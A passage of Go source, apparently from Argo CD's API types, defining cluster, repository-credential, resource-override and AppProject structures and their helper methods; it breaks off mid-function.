	// NetworkingInfo is populated for networking-related resources (services, ingresses, ...).
	NetworkingInfo *ResourceNetworkingInfo `json:"networkingInfo,omitempty" protobuf:"bytes,4,opt,name=networkingInfo"`
	ResourceVersion string                 `json:"resourceVersion,omitempty" protobuf:"bytes,5,opt,name=resourceVersion"`
	// Images lists container images referenced by the resource.
	Images []string `json:"images,omitempty" protobuf:"bytes,6,opt,name=images"`
	// Health is the resource's health assessment, if available.
	Health    *HealthStatus `json:"health,omitempty" protobuf:"bytes,7,opt,name=health"`
	CreatedAt *metav1.Time  `json:"createdAt,omitempty" protobuf:"bytes,8,opt,name=createdAt"`
}
// FullName returns the node's identity as "group/kind/namespace/name".
func (n *ResourceNode) FullName() string {
	return n.Group + "/" + n.Kind + "/" + n.Namespace + "/" + n.Name
}
// GroupKindVersion returns the node's GroupVersionKind.
func (n *ResourceNode) GroupKindVersion() schema.GroupVersionKind {
	return schema.GroupVersionKind{Group: n.Group, Version: n.Version, Kind: n.Kind}
}
// ResourceStatus holds the current sync and health status of a resource
type ResourceStatus struct {
	Group     string `json:"group,omitempty" protobuf:"bytes,1,opt,name=group"`
	Version   string `json:"version,omitempty" protobuf:"bytes,2,opt,name=version"`
	Kind      string `json:"kind,omitempty" protobuf:"bytes,3,opt,name=kind"`
	Namespace string `json:"namespace,omitempty" protobuf:"bytes,4,opt,name=namespace"`
	Name      string `json:"name,omitempty" protobuf:"bytes,5,opt,name=name"`
	// Status is the resource's sync state relative to the desired manifests.
	Status SyncStatusCode `json:"status,omitempty" protobuf:"bytes,6,opt,name=status"`
	// Health is the resource's health assessment, if available.
	Health *HealthStatus `json:"health,omitempty" protobuf:"bytes,7,opt,name=health"`
	// Hook is true when the resource is a sync hook rather than a managed resource.
	Hook bool `json:"hook,omitempty" protobuf:"bytes,8,opt,name=hook"`
	// RequiresPruning is true when the live resource no longer appears in the
	// desired manifests and would be deleted by a prune.
	RequiresPruning bool `json:"requiresPruning,omitempty" protobuf:"bytes,9,opt,name=requiresPruning"`
}
// GroupVersionKind returns the resource's GroupVersionKind.
func (r *ResourceStatus) GroupVersionKind() schema.GroupVersionKind {
	return schema.GroupVersionKind{
		Group:   r.Group,
		Version: r.Version,
		Kind:    r.Kind,
	}
}
// ResourceDiff holds the diff of a live and target resource object
type ResourceDiff struct {
	Group     string `json:"group,omitempty" protobuf:"bytes,1,opt,name=group"`
	Kind      string `json:"kind,omitempty" protobuf:"bytes,2,opt,name=kind"`
	Namespace string `json:"namespace,omitempty" protobuf:"bytes,3,opt,name=namespace"`
	Name      string `json:"name,omitempty" protobuf:"bytes,4,opt,name=name"`
	// TargetState contains the JSON serialized resource manifest defined in the Git/Helm
	TargetState string `json:"targetState,omitempty" protobuf:"bytes,5,opt,name=targetState"`
	// LiveState contains the JSON serialized live resource manifest
	LiveState string `json:"liveState,omitempty" protobuf:"bytes,6,opt,name=liveState"`
	// Diff contains the JSON patch between target and live resource
	// Deprecated: use NormalizedLiveState and PredictedLiveState to render the difference
	Diff string `json:"diff,omitempty" protobuf:"bytes,7,opt,name=diff"`
	// Hook is true when the resource is a sync hook.
	Hook bool `json:"hook,omitempty" protobuf:"bytes,8,opt,name=hook"`
	// NormalizedLiveState contains JSON serialized live resource state with applied normalizations
	NormalizedLiveState string `json:"normalizedLiveState,omitempty" protobuf:"bytes,9,opt,name=normalizedLiveState"`
	// PredictedLiveState contains JSON serialized resource state that is calculated based on normalized and target resource state
	PredictedLiveState string `json:"predictedLiveState,omitempty" protobuf:"bytes,10,opt,name=predictedLiveState"`
	ResourceVersion    string `json:"resourceVersion,omitempty" protobuf:"bytes,11,opt,name=resourceVersion"`
	// Modified is true when target and live states differ.
	Modified bool `json:"modified,omitempty" protobuf:"bytes,12,opt,name=modified"`
}
// FullName returns the "group/kind/namespace/name" identity of the node that was diffed.
func (r *ResourceDiff) FullName() string {
	return r.Group + "/" + r.Kind + "/" + r.Namespace + "/" + r.Name
}
// ConnectionStatus represents connection status
type ConnectionStatus = string

// Possible connection states for remote resources (repos, clusters).
const (
	ConnectionStatusSuccessful = "Successful"
	ConnectionStatusFailed     = "Failed"
	ConnectionStatusUnknown    = "Unknown"
)

// ConnectionState contains information about remote resource connection state
type ConnectionState struct {
	// Status is one of the ConnectionStatus* constants.
	Status ConnectionStatus `json:"status" protobuf:"bytes,1,opt,name=status"`
	// Message contains details about the last connection attempt.
	Message string `json:"message" protobuf:"bytes,2,opt,name=message"`
	// ModifiedAt is when the state was last updated (serialized as "attemptedAt").
	ModifiedAt *metav1.Time `json:"attemptedAt" protobuf:"bytes,3,opt,name=attemptedAt"`
}
// Cluster is the definition of a cluster resource
type Cluster struct {
	// ID is an internal field cluster identifier. Not exposed via API.
	ID string `json:"-"`
	// Server is the API server URL of the Kubernetes cluster
	Server string `json:"server" protobuf:"bytes,1,opt,name=server"`
	// Name of the cluster. If omitted, will use the server address
	Name string `json:"name" protobuf:"bytes,2,opt,name=name"`
	// Config holds cluster information for connecting to a cluster
	Config ClusterConfig `json:"config" protobuf:"bytes,3,opt,name=config"`
	// DEPRECATED: use Info.ConnectionState field instead.
	// ConnectionState contains information about cluster connection state
	ConnectionState ConnectionState `json:"connectionState,omitempty" protobuf:"bytes,4,opt,name=connectionState"`
	// DEPRECATED: use Info.ServerVersion field instead.
	// The server version
	ServerVersion string `json:"serverVersion,omitempty" protobuf:"bytes,5,opt,name=serverVersion"`
	// Holds list of namespaces which are accessible in that cluster. Cluster level resources would be ignored if namespace list is not empty.
	Namespaces []string `json:"namespaces,omitempty" protobuf:"bytes,6,opt,name=namespaces"`
	// RefreshRequestedAt holds time when cluster cache refresh has been requested
	RefreshRequestedAt *metav1.Time `json:"refreshRequestedAt,omitempty" protobuf:"bytes,7,opt,name=refreshRequestedAt"`
	// Holds information about cluster cache
	Info ClusterInfo `json:"info,omitempty" protobuf:"bytes,8,opt,name=info"`
	// Shard contains optional shard number. Calculated on the fly by the application controller if not specified.
	Shard *int64 `json:"shard,omitempty" protobuf:"bytes,9,opt,name=shard"`
}
// Equals reports whether two cluster definitions are equivalent: same server,
// name, namespace list, shard assignment (nil shard is treated as -1) and
// deeply-equal connection config.
func (c *Cluster) Equals(other *Cluster) bool {
	// shardOf normalizes an unset shard to -1 so nil and &(-1) compare equal.
	shardOf := func(cl *Cluster) int64 {
		if cl.Shard != nil {
			return *cl.Shard
		}
		return -1
	}
	switch {
	case c.Server != other.Server,
		c.Name != other.Name,
		strings.Join(c.Namespaces, ",") != strings.Join(other.Namespaces, ","),
		shardOf(c) != shardOf(other):
		return false
	}
	return reflect.DeepEqual(c.Config, other.Config)
}
// ClusterInfo holds dynamic information about a cluster observed by the
// application controller.
type ClusterInfo struct {
	// ConnectionState is the current connection state to the cluster API server.
	ConnectionState ConnectionState `json:"connectionState,omitempty" protobuf:"bytes,1,opt,name=connectionState"`
	// ServerVersion is the Kubernetes version reported by the cluster.
	ServerVersion string `json:"serverVersion,omitempty" protobuf:"bytes,2,opt,name=serverVersion"`
	// CacheInfo describes the state of the cluster resource cache.
	CacheInfo ClusterCacheInfo `json:"cacheInfo,omitempty" protobuf:"bytes,3,opt,name=cacheInfo"`
	// ApplicationsCount is the number of applications targeting this cluster.
	ApplicationsCount int64 `json:"applicationsCount" protobuf:"bytes,4,opt,name=applicationsCount"`
}

// ClusterCacheInfo holds statistics about the cluster resource cache.
type ClusterCacheInfo struct {
	// ResourcesCount holds number of observed Kubernetes resources
	ResourcesCount int64 `json:"resourcesCount,omitempty" protobuf:"bytes,1,opt,name=resourcesCount"`
	// APIsCount holds number of observed Kubernetes API count
	APIsCount int64 `json:"apisCount,omitempty" protobuf:"bytes,2,opt,name=apisCount"`
	// LastCacheSyncTime holds time of most recent cache synchronization
	LastCacheSyncTime *metav1.Time `json:"lastCacheSyncTime,omitempty" protobuf:"bytes,3,opt,name=lastCacheSyncTime"`
}

// ClusterList is a collection of Clusters.
type ClusterList struct {
	metav1.ListMeta `json:"metadata,omitempty" protobuf:"bytes,1,opt,name=metadata"`
	Items           []Cluster `json:"items" protobuf:"bytes,2,rep,name=items"`
}
// AWSAuthConfig is an AWS IAM authentication configuration
type AWSAuthConfig struct {
	// ClusterName contains AWS cluster name
	ClusterName string `json:"clusterName,omitempty" protobuf:"bytes,1,opt,name=clusterName"`
	// RoleARN contains optional role ARN. If set then AWS IAM Authenticator assume a role to perform cluster operations instead of the default AWS credential provider chain.
	RoleARN string `json:"roleARN,omitempty" protobuf:"bytes,2,opt,name=roleARN"`
}

// ExecProviderConfig is config used to call an external command to perform cluster authentication
// See: https://godoc.org/k8s.io/client-go/tools/clientcmd/api#ExecConfig
type ExecProviderConfig struct {
	// Command to execute
	Command string `json:"command,omitempty" protobuf:"bytes,1,opt,name=command"`
	// Arguments to pass to the command when executing it
	Args []string `json:"args,omitempty" protobuf:"bytes,2,rep,name=args"`
	// Env defines additional environment variables to expose to the process
	Env map[string]string `json:"env,omitempty" protobuf:"bytes,3,opt,name=env"`
	// Preferred input version of the ExecInfo
	APIVersion string `json:"apiVersion,omitempty" protobuf:"bytes,4,opt,name=apiVersion"`
	// This text is shown to the user when the executable doesn't seem to be present
	InstallHint string `json:"installHint,omitempty" protobuf:"bytes,5,opt,name=installHint"`
}
// ClusterConfig is the configuration attributes. This structure is subset of the go-client
// rest.Config with annotations added for marshalling.
type ClusterConfig struct {
	// Server requires Basic authentication
	Username string `json:"username,omitempty" protobuf:"bytes,1,opt,name=username"`
	Password string `json:"password,omitempty" protobuf:"bytes,2,opt,name=password"`
	// Server requires Bearer authentication. This client will not attempt to use
	// refresh tokens for an OAuth2 flow.
	// TODO: demonstrate an OAuth2 compatible client.
	BearerToken string `json:"bearerToken,omitempty" protobuf:"bytes,3,opt,name=bearerToken"`
	// TLSClientConfig contains settings to enable transport layer security
	TLSClientConfig `json:"tlsClientConfig" protobuf:"bytes,4,opt,name=tlsClientConfig"`
	// AWSAuthConfig contains IAM authentication configuration
	AWSAuthConfig *AWSAuthConfig `json:"awsAuthConfig,omitempty" protobuf:"bytes,5,opt,name=awsAuthConfig"`
	// ExecProviderConfig contains configuration for an exec provider
	ExecProviderConfig *ExecProviderConfig `json:"execProviderConfig,omitempty" protobuf:"bytes,6,opt,name=execProviderConfig"`
}

// TLSClientConfig contains settings to enable transport layer security
type TLSClientConfig struct {
	// Server should be accessed without verifying the TLS certificate. For testing only.
	Insecure bool `json:"insecure" protobuf:"bytes,1,opt,name=insecure"`
	// ServerName is passed to the server for SNI and is used in the client to check server
	// certificates against. If ServerName is empty, the hostname used to contact the
	// server is used.
	ServerName string `json:"serverName,omitempty" protobuf:"bytes,2,opt,name=serverName"`
	// CertData holds PEM-encoded bytes (typically read from a client certificate file).
	// CertData takes precedence over CertFile
	CertData []byte `json:"certData,omitempty" protobuf:"bytes,3,opt,name=certData"`
	// KeyData holds PEM-encoded bytes (typically read from a client certificate key file).
	// KeyData takes precedence over KeyFile
	KeyData []byte `json:"keyData,omitempty" protobuf:"bytes,4,opt,name=keyData"`
	// CAData holds PEM-encoded bytes (typically read from a root certificates bundle).
	// CAData takes precedence over CAFile
	CAData []byte `json:"caData,omitempty" protobuf:"bytes,5,opt,name=caData"`
}
// KnownTypeField contains mapping between CRD field and known Kubernetes type
type KnownTypeField struct {
	Field string `json:"field,omitempty" protobuf:"bytes,1,opt,name=field"`
	Type  string `json:"type,omitempty" protobuf:"bytes,2,opt,name=type"`
}

// OverrideIgnoreDiff holds JSON pointers to fields that should be ignored when diffing.
type OverrideIgnoreDiff struct {
	JSONPointers []string `json:"jsonPointers" protobuf:"bytes,1,rep,name=jSONPointers"`
}

// rawResourceOverride is the wire representation of ResourceOverride as stored
// in the argocd-cm ConfigMap; IgnoreDifferences is kept as a raw YAML string.
type rawResourceOverride struct {
	HealthLua         string           `json:"health.lua,omitempty"`
	Actions           string           `json:"actions,omitempty"`
	IgnoreDifferences string           `json:"ignoreDifferences,omitempty"`
	KnownTypeFields   []KnownTypeField `json:"knownTypeFields,omitempty"`
}

// ResourceOverride holds configuration to customize resource diffing and health assessment
type ResourceOverride struct {
	// HealthLua is a Lua script used to assess resource health.
	HealthLua string `protobuf:"bytes,1,opt,name=healthLua"`
	// Actions is a YAML document declaring custom resource actions.
	Actions string `protobuf:"bytes,3,opt,name=actions"`
	// IgnoreDifferences lists fields to ignore during diffing.
	IgnoreDifferences OverrideIgnoreDiff `protobuf:"bytes,2,opt,name=ignoreDifferences"`
	// KnownTypeFields maps CRD fields to known Kubernetes types.
	KnownTypeFields []KnownTypeField `protobuf:"bytes,4,opt,name=knownTypeFields"`
}
// UnmarshalJSON decodes the raw ConfigMap representation: scalar fields are
// copied straight across, while IgnoreDifferences arrives as an embedded YAML
// string that is parsed separately.
func (s *ResourceOverride) UnmarshalJSON(data []byte) error {
	var raw rawResourceOverride
	if err := json.Unmarshal(data, &raw); err != nil {
		return err
	}
	s.HealthLua = raw.HealthLua
	s.Actions = raw.Actions
	s.KnownTypeFields = raw.KnownTypeFields
	return yaml.Unmarshal([]byte(raw.IgnoreDifferences), &s.IgnoreDifferences)
}
// MarshalJSON encodes the override into its raw ConfigMap representation:
// IgnoreDifferences is serialized to an embedded YAML string, everything else
// is copied as-is.
func (s ResourceOverride) MarshalJSON() ([]byte, error) {
	ignoreDifferencesData, err := yaml.Marshal(s.IgnoreDifferences)
	if err != nil {
		return nil, err
	}
	// Use named fields: a positional literal silently breaks if
	// rawResourceOverride's field order ever changes.
	raw := &rawResourceOverride{
		HealthLua:         s.HealthLua,
		Actions:           s.Actions,
		IgnoreDifferences: string(ignoreDifferencesData),
		KnownTypeFields:   s.KnownTypeFields,
	}
	return json.Marshal(raw)
}
// GetActions parses the override's Actions YAML document into a
// ResourceActions value. On parse failure the zero value is returned together
// with the error.
func (s *ResourceOverride) GetActions() (ResourceActions, error) {
	// Receiver renamed to `s` for consistency with the type's other methods.
	var actions ResourceActions
	err := yaml.Unmarshal([]byte(s.Actions), &actions)
	return actions, err
}
// ResourceActions declares custom actions for a resource kind: a discovery
// script that decides which actions are available, plus the action definitions.
type ResourceActions struct {
	// ActionDiscoveryLua is a Lua script returning the available actions for a resource.
	ActionDiscoveryLua string `json:"discovery.lua,omitempty" yaml:"discovery.lua,omitempty" protobuf:"bytes,1,opt,name=actionDiscoveryLua"`
	// Definitions lists the named actions and their implementation scripts.
	Definitions []ResourceActionDefinition `json:"definitions,omitempty" protobuf:"bytes,2,rep,name=definitions"`
}

// ResourceActionDefinition pairs an action name with the Lua script implementing it.
type ResourceActionDefinition struct {
	Name      string `json:"name" protobuf:"bytes,1,opt,name=name"`
	ActionLua string `json:"action.lua" yaml:"action.lua" protobuf:"bytes,2,opt,name=actionLua"`
}

// ResourceAction is a single action instance as surfaced to clients.
type ResourceAction struct {
	Name string `json:"name,omitempty" protobuf:"bytes,1,opt,name=name"`
	// Params are the action's input parameters.
	Params []ResourceActionParam `json:"params,omitempty" protobuf:"bytes,2,rep,name=params"`
	// Disabled is true when the action is currently not applicable.
	Disabled bool `json:"disabled,omitempty" protobuf:"varint,3,opt,name=disabled"`
}

// ResourceActionParam describes one input parameter of a resource action.
type ResourceActionParam struct {
	Name    string `json:"name,omitempty" protobuf:"bytes,1,opt,name=name"`
	Value   string `json:"value,omitempty" protobuf:"bytes,2,opt,name=value"`
	Type    string `json:"type,omitempty" protobuf:"bytes,3,opt,name=type"`
	Default string `json:"default,omitempty" protobuf:"bytes,4,opt,name=default"`
}
// RepoCreds holds a repository credentials definition
type RepoCreds struct {
	// URL is the URL that this credentials matches to
	URL string `json:"url" protobuf:"bytes,1,opt,name=url"`
	// Username for authenticating at the repo server
	Username string `json:"username,omitempty" protobuf:"bytes,2,opt,name=username"`
	// Password for authenticating at the repo server
	Password string `json:"password,omitempty" protobuf:"bytes,3,opt,name=password"`
	// SSH private key data for authenticating at the repo server (only Git repos)
	SSHPrivateKey string `json:"sshPrivateKey,omitempty" protobuf:"bytes,4,opt,name=sshPrivateKey"`
	// TLS client cert data for authenticating at the repo server
	TLSClientCertData string `json:"tlsClientCertData,omitempty" protobuf:"bytes,5,opt,name=tlsClientCertData"`
	// TLS client cert key for authenticating at the repo server
	TLSClientCertKey string `json:"tlsClientCertKey,omitempty" protobuf:"bytes,6,opt,name=tlsClientCertKey"`
	// Github App Private Key PEM data
	GithubAppPrivateKey string `json:"githubAppPrivateKey,omitempty" protobuf:"bytes,7,opt,name=githubAppPrivateKey"`
	// Github App ID of the app used to access the repo
	GithubAppId int64 `json:"githubAppID,omitempty" protobuf:"bytes,8,opt,name=githubAppID"`
	// Github App Installation ID of the installed GitHub App
	GithubAppInstallationId int64 `json:"githubAppInstallationID,omitempty" protobuf:"bytes,9,opt,name=githubAppInstallationID"`
	// Github App Enterprise base url if empty will default to https://api.github.com
	GitHubAppEnterpriseBaseURL string `json:"githubAppEnterpriseBaseUrl,omitempty" protobuf:"bytes,10,opt,name=githubAppEnterpriseBaseUrl"`
}
// Repository is a repository holding application configurations
type Repository struct {
	// URL of the repo
	Repo string `json:"repo" protobuf:"bytes,1,opt,name=repo"`
	// Username for authenticating at the repo server
	Username string `json:"username,omitempty" protobuf:"bytes,2,opt,name=username"`
	// Password for authenticating at the repo server
	Password string `json:"password,omitempty" protobuf:"bytes,3,opt,name=password"`
	// SSH private key data for authenticating at the repo server
	// only for Git repos
	SSHPrivateKey string `json:"sshPrivateKey,omitempty" protobuf:"bytes,4,opt,name=sshPrivateKey"`
	// Current state of repository server connecting
	ConnectionState ConnectionState `json:"connectionState,omitempty" protobuf:"bytes,5,opt,name=connectionState"`
	// InsecureIgnoreHostKey should not be used anymore, Insecure is favoured
	// only for Git repos
	InsecureIgnoreHostKey bool `json:"insecureIgnoreHostKey,omitempty" protobuf:"bytes,6,opt,name=insecureIgnoreHostKey"`
	// Whether the repo is insecure
	Insecure bool `json:"insecure,omitempty" protobuf:"bytes,7,opt,name=insecure"`
	// Whether git-lfs support should be enabled for this repo
	EnableLFS bool `json:"enableLfs,omitempty" protobuf:"bytes,8,opt,name=enableLfs"`
	// TLS client cert data for authenticating at the repo server
	TLSClientCertData string `json:"tlsClientCertData,omitempty" protobuf:"bytes,9,opt,name=tlsClientCertData"`
	// TLS client cert key for authenticating at the repo server
	TLSClientCertKey string `json:"tlsClientCertKey,omitempty" protobuf:"bytes,10,opt,name=tlsClientCertKey"`
	// Type of the repo, either "git" or "helm"; "git" is assumed if empty or absent
	Type string `json:"type,omitempty" protobuf:"bytes,11,opt,name=type"`
	// only for Helm repos
	Name string `json:"name,omitempty" protobuf:"bytes,12,opt,name=name"`
	// Whether credentials were inherited from a credential set
	InheritedCreds bool `json:"inheritedCreds,omitempty" protobuf:"bytes,13,opt,name=inheritedCreds"`
	// Whether helm-oci support should be enabled for this repo
	EnableOCI bool `json:"enableOCI,omitempty" protobuf:"bytes,14,opt,name=enableOCI"`
	// Github App Private Key PEM data
	GithubAppPrivateKey string `json:"githubAppPrivateKey,omitempty" protobuf:"bytes,15,opt,name=githubAppPrivateKey"`
	// Github App ID of the app used to access the repo
	GithubAppId int64 `json:"githubAppID,omitempty" protobuf:"bytes,16,opt,name=githubAppID"`
	// Github App Installation ID of the installed GitHub App
	GithubAppInstallationId int64 `json:"githubAppInstallationID,omitempty" protobuf:"bytes,17,opt,name=githubAppInstallationID"`
	// Github App Enterprise base url if empty will default to https://api.github.com
	GitHubAppEnterpriseBaseURL string `json:"githubAppEnterpriseBaseUrl,omitempty" protobuf:"bytes,18,opt,name=githubAppEnterpriseBaseUrl"`
}
// IsInsecure returns true if receiver has been configured to skip server verification
// (either via the deprecated InsecureIgnoreHostKey flag or the Insecure flag).
func (repo *Repository) IsInsecure() bool {
	return repo.InsecureIgnoreHostKey || repo.Insecure
}

// IsLFSEnabled returns true if LFS support is enabled on receiver
func (repo *Repository) IsLFSEnabled() bool {
	return repo.EnableLFS
}
// HasCredentials returns true when the receiver has been configured with any
// credentials: basic auth, an SSH private key, a TLS client cert, or a GitHub
// App private key.
// Receiver renamed from `m` to `repo` for consistency with the type's other methods.
func (repo *Repository) HasCredentials() bool {
	return repo.Username != "" || repo.Password != "" || repo.SSHPrivateKey != "" || repo.TLSClientCertData != "" || repo.GithubAppPrivateKey != ""
}
// CopyCredentialsFromRepo fills in any credential field that is still unset on
// the receiver with the corresponding value from source. Fields that already
// have a value are left untouched. A nil source is a no-op.
func (repo *Repository) CopyCredentialsFromRepo(source *Repository) {
	if source == nil {
		return
	}
	// fillString copies src into *dst only when *dst is empty.
	fillString := func(dst *string, src string) {
		if *dst == "" {
			*dst = src
		}
	}
	fillString(&repo.Username, source.Username)
	fillString(&repo.Password, source.Password)
	fillString(&repo.SSHPrivateKey, source.SSHPrivateKey)
	fillString(&repo.TLSClientCertData, source.TLSClientCertData)
	fillString(&repo.TLSClientCertKey, source.TLSClientCertKey)
	fillString(&repo.GithubAppPrivateKey, source.GithubAppPrivateKey)
	if repo.GithubAppId == 0 {
		repo.GithubAppId = source.GithubAppId
	}
	if repo.GithubAppInstallationId == 0 {
		repo.GithubAppInstallationId = source.GithubAppInstallationId
	}
	fillString(&repo.GitHubAppEnterpriseBaseURL, source.GitHubAppEnterpriseBaseURL)
}
// CopyCredentialsFrom fills in any credential field that is still unset on the
// receiver with the corresponding value from the RepoCreds source. Fields that
// already have a value are left untouched. A nil source is a no-op.
func (repo *Repository) CopyCredentialsFrom(source *RepoCreds) {
	if source == nil {
		return
	}
	// fillString copies src into *dst only when *dst is empty.
	fillString := func(dst *string, src string) {
		if *dst == "" {
			*dst = src
		}
	}
	fillString(&repo.Username, source.Username)
	fillString(&repo.Password, source.Password)
	fillString(&repo.SSHPrivateKey, source.SSHPrivateKey)
	fillString(&repo.TLSClientCertData, source.TLSClientCertData)
	fillString(&repo.TLSClientCertKey, source.TLSClientCertKey)
	fillString(&repo.GithubAppPrivateKey, source.GithubAppPrivateKey)
	if repo.GithubAppId == 0 {
		repo.GithubAppId = source.GithubAppId
	}
	if repo.GithubAppInstallationId == 0 {
		repo.GithubAppInstallationId = source.GithubAppInstallationId
	}
	fillString(&repo.GitHubAppEnterpriseBaseURL, source.GitHubAppEnterpriseBaseURL)
}
// GetGitCreds selects the Git credential implementation for this repository.
// Precedence: HTTPS basic auth, then SSH private key, then GitHub App; when
// nothing matches (or the receiver is nil) no-op credentials are returned.
func (repo *Repository) GetGitCreds() git.Creds {
	if repo == nil {
		return git.NopCreds{}
	}
	switch {
	case repo.Username != "" && repo.Password != "":
		return git.NewHTTPSCreds(repo.Username, repo.Password, repo.TLSClientCertData, repo.TLSClientCertKey, repo.IsInsecure())
	case repo.SSHPrivateKey != "":
		return git.NewSSHCreds(repo.SSHPrivateKey, getCAPath(repo.Repo), repo.IsInsecure())
	case repo.GithubAppPrivateKey != "" && repo.GithubAppId != 0 && repo.GithubAppInstallationId != 0:
		return git.NewGitHubAppCreds(repo.GithubAppId, repo.GithubAppInstallationId, repo.GithubAppPrivateKey, repo.GitHubAppEnterpriseBaseURL, repo.Repo, repo.TLSClientCertData, repo.TLSClientCertKey, repo.IsInsecure())
	default:
		return git.NopCreds{}
	}
}
// GetHelmCreds builds Helm credentials from the repository's configured
// username/password, TLS client cert material, and insecure flag. The CA
// bundle path is resolved from the repo URL's host.
func (repo *Repository) GetHelmCreds() helm.Creds {
	return helm.Creds{
		Username:           repo.Username,
		Password:           repo.Password,
		CAPath:             getCAPath(repo.Repo),
		CertData:           []byte(repo.TLSClientCertData),
		KeyData:            []byte(repo.TLSClientCertKey),
		InsecureSkipVerify: repo.Insecure,
	}
}
// getCAPath returns the path to the CA cert bundle configured for the repo
// URL's host, or "" when the URL is not HTTPS, cannot be parsed, or no bundle
// is configured. Failures are logged but never fatal: callers proceed without
// a custom CA bundle.
func getCAPath(repoURL string) string {
	if !git.IsHTTPSURL(repoURL) {
		return ""
	}
	parsedURL, err := url.Parse(repoURL)
	if err != nil {
		// Don't fail on an unparsable URL; execute the command in a verbatim way.
		log.Warnf("Could not parse repo URL '%s': %v", repoURL, err)
		return ""
	}
	caPath, err := cert.GetCertBundlePathForRepository(parsedURL.Host)
	if err != nil {
		log.Warnf("Could not get cert bundle path for host '%s': %v", parsedURL.Host, err)
		return ""
	}
	return caPath
}
// CopySettingsFrom copies all repository settings from source to receiver.
// A nil source is a no-op. Credentials are intentionally not copied here; see
// CopyCredentialsFrom / CopyCredentialsFromRepo for those.
// Receiver renamed from `m` to `repo` for consistency with the type's other methods.
func (repo *Repository) CopySettingsFrom(source *Repository) {
	if source == nil {
		return
	}
	repo.EnableLFS = source.EnableLFS
	repo.InsecureIgnoreHostKey = source.InsecureIgnoreHostKey
	repo.Insecure = source.Insecure
	repo.InheritedCreds = source.InheritedCreds
}
// Repositories is a list of repository pointers with filtering helpers.
type Repositories []*Repository

// Filter returns the repositories for which predicate reports true,
// preserving their original order.
func (r Repositories) Filter(predicate func(r *Repository) bool) Repositories {
	var matched Repositories
	for _, repo := range r {
		if predicate(repo) {
			matched = append(matched, repo)
		}
	}
	return matched
}
// RepositoryList is a collection of Repositories.
type RepositoryList struct {
	metav1.ListMeta `json:"metadata,omitempty" protobuf:"bytes,1,opt,name=metadata"`
	Items           Repositories `json:"items" protobuf:"bytes,2,rep,name=items"`
}

// RepoCredsList is a collection of RepoCreds.
type RepoCredsList struct {
	metav1.ListMeta `json:"metadata,omitempty" protobuf:"bytes,1,opt,name=metadata"`
	Items           []RepoCreds `json:"items" protobuf:"bytes,2,rep,name=items"`
}
// A RepositoryCertificate is either SSH known hosts entry or TLS certificate
type RepositoryCertificate struct {
	// Name of the server the certificate is intended for
	ServerName string `json:"serverName" protobuf:"bytes,1,opt,name=serverName"`
	// Type of certificate - currently "https" or "ssh"
	CertType string `json:"certType" protobuf:"bytes,2,opt,name=certType"`
	// The sub type of the cert, i.e. "ssh-rsa"
	CertSubType string `json:"certSubType" protobuf:"bytes,3,opt,name=certSubType"`
	// Actual certificate data, protocol dependent
	CertData []byte `json:"certData" protobuf:"bytes,4,opt,name=certData"`
	// Additional certificate info (e.g. SSH fingerprint, X509 CommonName)
	CertInfo string `json:"certInfo" protobuf:"bytes,5,opt,name=certInfo"`
}

// RepositoryCertificateList is a collection of RepositoryCertificates
type RepositoryCertificateList struct {
	metav1.ListMeta `json:"metadata,omitempty" protobuf:"bytes,1,opt,name=metadata"`
	// List of certificates to be processed
	Items []RepositoryCertificate `json:"items" protobuf:"bytes,2,rep,name=items"`
}
// GnuPGPublicKey is a representation of a GnuPG public key
type GnuPGPublicKey struct {
	// KeyID in hexadecimal string format
	KeyID string `json:"keyID" protobuf:"bytes,1,opt,name=keyID"`
	// Fingerprint of the key
	Fingerprint string `json:"fingerprint,omitempty" protobuf:"bytes,2,opt,name=fingerprint"`
	// Owner identification
	Owner string `json:"owner,omitempty" protobuf:"bytes,3,opt,name=owner"`
	// Trust level
	Trust string `json:"trust,omitempty" protobuf:"bytes,4,opt,name=trust"`
	// Key sub type (e.g. rsa4096)
	SubType string `json:"subType,omitempty" protobuf:"bytes,5,opt,name=subType"`
	// Key data
	KeyData string `json:"keyData,omitempty" protobuf:"bytes,6,opt,name=keyData"`
}

// GnuPGPublicKeyList is a collection of GnuPGPublicKey objects
type GnuPGPublicKeyList struct {
	metav1.ListMeta `json:"metadata,omitempty" protobuf:"bytes,1,opt,name=metadata"`
	Items           []GnuPGPublicKey `json:"items" protobuf:"bytes,2,rep,name=items"`
}
// AppProjectList is list of AppProject resources
// +k8s:deepcopy-gen:interfaces=k8s.io/apimachinery/pkg/runtime.Object
type AppProjectList struct {
	metav1.TypeMeta `json:",inline"`
	metav1.ListMeta `json:"metadata" protobuf:"bytes,1,opt,name=metadata"`
	Items           []AppProject `json:"items" protobuf:"bytes,2,rep,name=items"`
}

// AppProject provides a logical grouping of applications, providing controls for:
// * where the apps may deploy to (cluster whitelist)
// * what may be deployed (repository whitelist, resource whitelist/blacklist)
// * who can access these applications (roles, OIDC group claims bindings)
// * and what they can do (RBAC policies)
// * automation access to these roles (JWT tokens)
// +genclient
// +genclient:noStatus
// +k8s:deepcopy-gen:interfaces=k8s.io/apimachinery/pkg/runtime.Object
// +kubebuilder:resource:path=appprojects,shortName=appproj;appprojs
type AppProject struct {
	metav1.TypeMeta   `json:",inline"`
	metav1.ObjectMeta `json:"metadata" protobuf:"bytes,1,opt,name=metadata"`
	// Spec is the desired project configuration.
	Spec AppProjectSpec `json:"spec" protobuf:"bytes,2,opt,name=spec"`
	// Status holds operational state, e.g. JWT tokens issued per role.
	Status AppProjectStatus `json:"status,omitempty" protobuf:"bytes,3,opt,name=status"`
}
// GetRoleByName returns a copy of the named role together with its index in
// Spec.Roles, or an error when no role with that name exists.
func (p *AppProject) GetRoleByName(name string) (*ProjectRole, int, error) {
	for i := range p.Spec.Roles {
		if p.Spec.Roles[i].Name != name {
			continue
		}
		// Return a pointer to a copy; callers that mutate the role write it
		// back into Spec.Roles themselves (see AddGroupToRole).
		role := p.Spec.Roles[i]
		return &role, i, nil
	}
	return nil, -1, fmt.Errorf("role '%s' does not exist in project '%s'", name, p.Name)
}
// GetJWTTokenFromSpec looks up a JWTToken of a project role, first by id (new
// tokens) and then by issue time (old tokens). It returns the token, its index
// within the role's JWTTokens, or an error when the token cannot be found.
func (p *AppProject) GetJWTTokenFromSpec(roleName string, issuedAt int64, id string) (*JWTToken, int, error) {
	// For backward compatibility: in older versions JWTTokens are stored under spec.roles.
	role, _, err := p.GetRoleByName(roleName)
	if err != nil {
		return nil, -1, err
	}
	if id != "" {
		for i := range role.JWTTokens {
			if role.JWTTokens[i].ID == id {
				token := role.JWTTokens[i]
				return &token, i, nil
			}
		}
	}
	if issuedAt != -1 {
		for i := range role.JWTTokens {
			if role.JWTTokens[i].IssuedAt == issuedAt {
